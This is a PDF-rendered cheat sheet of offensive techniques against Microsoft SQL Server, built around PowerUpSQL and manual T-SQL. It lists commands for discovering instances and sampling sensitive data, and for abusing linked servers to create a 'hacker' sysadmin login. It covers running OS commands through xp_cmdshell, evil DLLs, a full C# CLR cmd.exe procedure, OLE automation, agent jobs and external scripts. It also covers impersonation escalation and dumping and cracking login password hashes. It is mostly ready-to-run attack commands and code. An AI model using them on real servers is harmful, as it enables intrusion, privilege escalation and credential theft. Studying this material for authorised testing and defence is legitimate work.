MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

MSSQL Server Cheat Sheet for Security

Engineers

Summary

Tools
Identify Instances and Databases
Discover Local SQL Server Instances
Discover Domain SQL Server Instances
Discover Remote SQL Server Instances
Identify Encrypted databases
Version Query
Identify Sensitive Information
Get Tables from a Specific Database
Gather 5 Entries from Each Column
Gather 5 Entries from a Specific Table

https://md2pdf.netlify.app/ Page 1 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Dump common information from server to files

Linked Database
Find Trusted Link
Execute Query Through The Link
Crawl Links for Instances in the Domain
Crawl Links for a Specific Instance
Query Version of Linked Database
Execute Procedure on Linked Database
Determine Names of Linked Databases
Determine All the Tables Names from a Selected Linked Database
Gather the Top 5 Columns from a Selected Linked Table
Gather Entries from a Selected Linked Column
Command Execution via xp_cmdshell
Extended Stored Procedure
Add the extended stored procedure and list extended stored procedures
CLR Assemblies
Execute commands using CLR assembly
Manually creating a CLR DLL and importing it
OLE Automation
Execute commands using OLE automation procedures
Agent Jobs
Execute commands through SQL Agent Job service
List All Jobs
External Scripts
Python
R
Audit Checks
Find and exploit impersonation opportunities
Find databases that have been configured as trustworthy
Manual SQL Server Queries
Query Current User & determine if the user is a sysadmin
Current Role
Current DB
List all tables

https://md2pdf.netlify.app/ Page 2 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

List all databases

All Logins on Server
All Database Users for a Database
List All Sysadmins
List All Database Roles
Effective Permissions from the Server
Effective Permissions from the Database
Find SQL Server Logins Which can be Impersonated for the Current Database
Exploiting Impersonation
Exploiting Nested Impersonation
MSSQL Accounts and Hashes
References

Tools

NetSPI/PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server

skahwah/SQLRecon - A C# MS SQL toolkit designed for offensive reconnaissance and post-
exploitation.

Identify Instances and Databases

Discover Local SQL Server Instances

Get-SQLInstanceLocal

Discover Domain SQL Server Instances

Get-SQLInstanceDomain
# Get Server Info for
Get-SQLInstanceDomain
# Get Database Names
Get-SQLInstanceDomain
-Verbose
Found Instances
| Get-SQLServerInfo -Verbose
| Get-SQLDatabase -NoDefaults

Discover Remote SQL Server Instances

https://md2pdf.netlify.app/ Page 3 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1

Identify Encrypted databases

Note: These are automatically decrypted for admins

Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance

Version Query

Get-SQLInstanceDomain | Get-Query "select @@version"

Identify Sensitive Information

Get Tables from a Specific Database

Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -

Get Column Details from a Table
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>

Gather 5 Entries from Each Column

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,col

Gather 5 Entries from a Specific Table

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <Databas

Dump common information from server to files

https://md2pdf.netlify.app/ Page 4 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv

Linked Database

Find Trusted Link

select * from master..sysservers

Execute Query Through The Link

-- execute query through the link

select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery

select version from openquery("link1",'select version from openquery("link2","select @@

-- execute shell commands

EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges

EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOM
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINI

Crawl Links for Instances in the Domain

A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results

Get-SQLInstanceDomain | Get-SQLServerLink -Verbose

select * from master..sysservers

Crawl Links for a Specific Instance

Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose

select * from openquery("<instance>",'select * from openquery("<instance2>",''select *

https://md2pdf.netlify.app/ Page 5 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Query Version of Linked Database

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Execute Procedure on Linked Database

SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local

SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";

Determine Names of Linked Databases

tempdb, model ,and msdb are default databases usually not worth looking into. Master is
also default but may have something and anything else is custom and definitely worth
digging into. The result is DatabaseName which feeds into following query.

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Determine All the Tables Names from a Selected Linked Database

The result is TableName which feeds into following query

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Gather the Top 5 Columns from a Selected Linked Table

The results are ColumnName and ColumnValue which feed into following query

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

https://md2pdf.netlify.app/ Page 6 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Gather Entries from a Selected Linked Column

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Command Execution via xp_cmdshell

xp_cmdshell disabled by default since SQL Server 2005

PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM

# Creates and adds local user backup to the local administrators group:
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM

Manually execute the SQL query

EXEC xp_cmdshell "net user";

EXEC master..xp_cmdshell 'whoami'
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)

EXEC sp_configure 'show advanced options',1;

RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

If the procedure was uninstalled

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

Extended Stored Procedure

Add the extended stored procedure and list extended stored procedures

# Create evil DLL

https://md2pdf.netlify.app/ Page 7 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -

# Load the DLL and call xp_test

Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>"
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>"

# Listing existing
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose

Build a DLL using xp_evil_template.cpp

Load the DLL

-- can also be loaded from UNC path or Webdav

sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
EXEC xp_calc
sp_dropextendedproc 'xp_calc'

CLR Assemblies

Prerequisites:

sysadmin privileges
CREATE ASSEMBLY permission (or)
ALTER ASSEMBLY permission (or)

The execution takes place with privileges of the service account.

Execute commands using CLR assembly

# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desk

# Execute command using CLR assembly

Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "who
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta

# List all the stored procedures added using CLR

Get-SQLStoredProcedureCLR -Instance <instance> -Verbose

https://md2pdf.netlify.app/ Page 8 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Manually creating a CLR DLL and importing it

Create a C# DLL file with the following content, with the command :
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library
c:\temp\cmd_exec.cs

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures

{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void cmd_exec (SqlString execCommand)
{
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();

// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NV

// Mark the beginning of the result set.

SqlContext.Pipe.SendResultsStart(record);

// Set values for each column in the row

record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

// Send the row back to the client.

SqlContext.Pipe.SendResultsRow(record);

// Mark the end of the result set.

SqlContext.Pipe.SendResultsEnd();

proc.WaitForExit();
proc.Close();
}
};

https://md2pdf.netlify.app/ Page 9 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Then follow these instructions:

1. Enable show advanced options on the server

sp_configure 'show advanced options',1;

RECONFIGURE
GO

2. Enable CLR on the server

sp_configure 'clr enabled',1

RECONFIGURE
GO

3. Import the assembly

CREATE ASSEMBLY my_assembly

FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;

4. Link the assembly to a stored procedure

CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my

GO

5. Execute and clean

cmd_exec "whoami"
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly

CREATE ASSEMBLY will also accept an hexadecimal string representation of a CLR DLL

CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM

0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE
GO

https://md2pdf.netlify.app/ Page 10 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

OLE Automation

:warning: Disabled by default

The execution takes place with privileges of the service account.

Execute commands using OLE automation procedures

Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta

# Enable OLE Automation

EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure

# Execute commands
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
python3 mssqlclient.py 'host/username:[email protected]' -install -clr Microsoft.Sql
python3 mssqlclient.py 'host/username:[email protected]' -check -reciclador 'C:\wind
python3 mssqlclient.py 'host/username:[email protected]' -start -reciclador 'C:\wind
SQL> enable_ole
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll

Agent Jobs

The execution takes place with privileges of the SQL Server Agent service account if a
proxy account is not configured.
:warning: Require sysadmin or SQLAgentUserRole, SQLAgentReaderRole, and
SQLAgentOperatorRole roles to create a job.

Execute commands through SQL Agent Job service

https://md2pdf.netlify.app/ Page 11 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Inst

Subsystem Options:
–Subsystem CmdExec
-SubSystem PowerShell
–Subsystem VBScript
–Subsystem Jscript

USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';

-- delete
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';

List All Jobs

SELECT job_id, [name] FROM msdb.dbo.sysjobs;

SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command,
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password12

External Scripts

:warning: You need to enable external scripts.

sp_configure 'external scripts enabled', 1;

RECONFIGURE;

Python:

Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBIn

EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = su

WITH RESULT SETS (([cmd_out] nvarchar(max)))

https://md2pdf.netlify.app/ Page 12 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstanc

EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(sy

WITH RESULT SETS (([cmd_out] text));
GO

@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'

Audit Checks

Find and exploit impersonation opportunities

Impersonate as: EXECUTE AS LOGIN = 'sa'
Impersonate dbo with DB_OWNER

SQL> select is_member('db_owner');

SQL> execute as user = 'dbo'
SQL> SELECT is_srvrolemember('sysadmin')

Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBS

# impersonate sa account
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN =

Find databases that have been configured as trustworthy

Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_o

The following audit checks run web requests to load Inveigh via reflection. Be mindful of the

https://md2pdf.netlify.app/ Page 13 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

environment and ability to connect outbound.

Invoke-SQLAuditPrivXpDirtree
Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist

Manual SQL Server Queries

Query Current User & determine if the user is a sysadmin

select suser_sname()
Select system_user
select is_srvrolemember('sysadmin')

Current Role

Select user

Current DB

select db_name()

List all tables

select table_name from information_schema.tables

List all databases

select name from master..sysdatabases

All Logins on Server

Select * from sys.server_principals where type_desc != 'SERVER_ROLE'

https://md2pdf.netlify.app/ Page 14 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

All Database Users for a Database

Select * from sys.database_principals where type_desc != 'database_role';

List All Sysadmins

SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('s

List All Database Roles

SELECT DB1.name AS DatabaseRoleName,

isnull (DB2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM
RIGHT OUTER JOIN sys.database_principals AS DB1
ON DRM.role_principal_id = DB1.principal_id
LEFT OUTER JOIN sys.database_principals AS DB2
ON DRM.member_principal_id = DB2.principal_id
WHERE DB1.type = 'R'
ORDER BY DB1.name;

Effective Permissions from the Server

select * from fn_my_permissions(null, 'server');

Effective Permissions from the Database

SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE');

Find SQL Server Logins Which can be Impersonated for the Current
Database

select distinct b.name

from sys.server_permissions a

https://md2pdf.netlify.app/ Page 15 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

inner join sys.server_principals b

on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate'

Exploiting Impersonation

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'adminuser'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()

Exploiting Nested Impersonation

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'stduser'
SELECT SYSTEM_USER
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER

MSSQL Accounts and Hashes

MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to co

MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_log

Then crack passwords using Hashcat : hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt

/usr/share/wordlists/rockyou.txt --force

131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972

132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe

https://md2pdf.netlify.app/ Page 16 of 17
MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8f

References

PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt

PowerUpSQL Cheat Sheet - Scott Sutherland
Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017
MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016

https://md2pdf.netlify.app/ Page 17 of 17